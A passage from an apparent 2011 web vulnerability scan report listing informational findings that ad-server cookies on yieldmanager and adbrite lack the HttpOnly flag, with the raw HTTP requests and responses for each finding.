Set-Cookie: fc=vaJ6aoyywMi4NqtlKsU64lht9mm7-E1xIImTItPA1urbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOwF6Kobi_0otjkQAmScc-TZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: pf=A62R0s-qigjspkCN3ccCJZUfVYhQeEUQKVt0ATDwEBd4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg636sNildKFCNXpyKvUiTLZIHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:22 GMT
Content-Length: 10227


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

14.50. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?AAAAAOmuGgC5qoYAAAAAAPdTIgAAAAAAAgAAAAAAAAAAAP8AAAAFCD6tBwAAAAAAEwUtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsRBEAAAAAAAICAgAAAAAAaJHtfD81IkBoke18PzUiQAAAAAAAAAAA..-.J2RBLUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4vrjsurAUCtON08oY0hycui5W9Iusk.A73L85AAAAAA==,,http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7vc_zcf-qaineur8rrn2eld1uychhmipkrv4hu2icszqhp18zi-zqhke8c0nditmgf6myi8crelfjtduqvtegsrgy6_nrn4uxmreqxnqebzqbc2utdekuiaxnrmz27autdpfjeh2pryyomlkmtkon5opgpo8kgkayibaqbf1acaq3oe_aadgfwuaaeca2wgaako-cvbzuyzzqte2afpcgwaaapa,Z%3D0x0%26anmember%3D541%26anprice%3D%26y%3D29%26s%3D1748713%26_salt%3D1407533862%26B%3D10%26r%3D0,a5755db2-7c8f-11e0-be3e-1cc1de0869c8 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 12:02:06 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0021.rm.bf1
Set-Cookie: ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; path=/; expires=Sat, 11-May-2013 12:02:06 GMT
Set-Cookie: vuday1=!!!!#N==#3P+HYn; path=/; expires=Fri, 13-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eH~M.jTN"; path=/; expires=Sat, 11-May-2013 12:02:06 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://cpadominator.com/campaigns/index.php?g=cxnsw&kw=ym
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:06 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.51. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1748713&_salt=1407533862&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0196.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:03 GMT
Pragma: no-cache
Content-Length: 7080
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)
...[SNIP]...

14.52. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1274605&id=56918&id=315889&id=1009698&id=621393&id=665981&id=1268392&id=317325&id=1198035&id=1049794&id=1238051&id=481602&id=185980&id=770484&id=757774&id=74560&id=1086373&id=1196055&id=1086372&id=1264419&id=593881&id=1215295&id=1236954&id=1086371&id=1086370&id=1086369&id=926097&id=1236953&id=1196051&id=1236950&id=1236951&id=1147048&id=107089&id=1049851&id=1096152&id=1063912&id=1166710&id=1063916&id=1063911&id=1063910&id=1215322&id=1009546&id=715901&id=1023315&id=715883&id=725071&id=109108&id=75921&id=1081817&id=1006093&id=86237&id=1006089&id=1009578&id=1049785&id=1191521&id=1201817&id=1086731&id=641525&id=1049788&id=124865&id=1284585&id=1086733&id=1077940&id=1044410&id=1093100&id=613349&id=1010298&id=397181&id=1009462&id=397180&id=1044578&id=1010301&id=1041270&id=1020427&id=1093092&id=1093093&id=1049769&id=1049770&id=596293&id=576685&id=596292&id=1049772&id=1044587&id=596291&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:03:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%4!!*oY!!!!,=!=9l!!-?2!!!!2=!=9l!!-O3!!!!'=!=9l!!.tS!!!!-=!=9l!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!1jo!!!!#=!=9l!!2(j!!!!/<whqI!!2+Y!!!!#=!=9l!!2a*!!!!#=!4ti!!4<!!!!!#=!=9l!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!=d!!!!!#=!=9l!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!ONX!!!!#<wle$!!ObA!!!!-=!=9l!!Os7!!!!#=!=9l!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!Zwa!!!!#=!=9l!!Zwb!!!!+=!=9l!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!g[r!!!!#=!=9l!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!-=!=9l!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!-=!=9l!!wQ3!!!!-=!=9l!!wQ4!!!!#=!=9l!!wQ5!!!!-=!=9l!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!!ypo!!!!#=!=9l!##!O!!!!#=!=9l!#%hB!!!!#=!=9l!#'uj!!!!#<wsgD!#*2)!!!!#=!=9l!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*0!!!!#=!=9l!#1*C!!!!+=!=9l!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#6oy!!!!#=!=9l!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8ZP!!!!#=!=9l!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#M]c!!!!)<xt,H!#O29!!!!+=!=9l!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!+=!=9l!#Z8E!!!!#=!=9l!#ZPp!!!!#<y,`,!#Zb$!!!!#=!=9l!#Zc#!!!!#=!=9l!#ZcE!!!!#=!=9l!#Zdi!!!!#=!=
9l!#Zkn!!!!#=!=9l!#Zkq!!!!#=!=9l!#]%`!!!!%=!$iT!#]7$!!!!#=!=9l!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!+=!=9l!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!+=!=9l!#`S2!!!!-=!=9l!#`U0!!!!,=!=9l!#`U9!!!!+=!=9l!#a4,!!!!#<y,`,!#a=6!!!!,=!=9l!#a=7!!!!,=!=9l!#a=9!!!!,=!=9l!#a=G!!!!#=!=9l!#a=J!!!!#=!=9l!#a=P!!!!,=!=9l!#a>3!!!!#=!=9l!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c8V!!!!+=!=9l!#c8W!!!!+=!=9l!#c8X!!!!+=!=9l!#c8]!!!!+=!=9l!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!%=!=9l!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#ec9!!!!#=!=9l!#fBj!!!!#=!=9l!#fBk!!!!#=!=9l!#fBl!!!!#=!=9l!#fBm!!!!#=!=9l!#fBn!!!!#=!=9l!#fG)!!!!+=!=9l!#fG+!!!!,=!=9l!#ffc!!!!#=!27c!#g<r!!!!#=!=9l!#g<s!!!!#=!=9l!#g=!!!!!+=!=9l!#g]5!!!!)<xdAS!#gar!!!!#=!=9l!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#n`.!!!!#=!27c!#ne_!!!!+=!=9l!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#qM!!!!!#=!=9l!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#trq!!!!#=!=9l!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!+=!=9l!#uR7!!!!#=!=9l!#ujQ!!!!+=!=9l!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vA$!!!!#=!=9l!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#x4V!!!!#=!=9l!#x4r!!!!#=!=9l!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#4B!!!!#=!=9l!$#4C!!!!#=!=9l!$#4E!!!!#=!=9l!$#4F!!!!#=!=9l!$#B>!!!!*=!=9l!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!-=!=9l!$(Gt!!!!/=!2<(!$(S9!!!!+=!=9l!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)
GB!!!!-=!=9l!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!+=!=9l!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; path=/; expires=Sat, 11-May-2013 11:03:11 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457" height="1" width="1"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 11:03:11 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.53. http://ad.yieldmanager.com/unpixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=1230047 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="...[SNIP]..."; path=/; expires=Sat, 11-May-2013 11:38:37 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 11:38:37 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.54. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

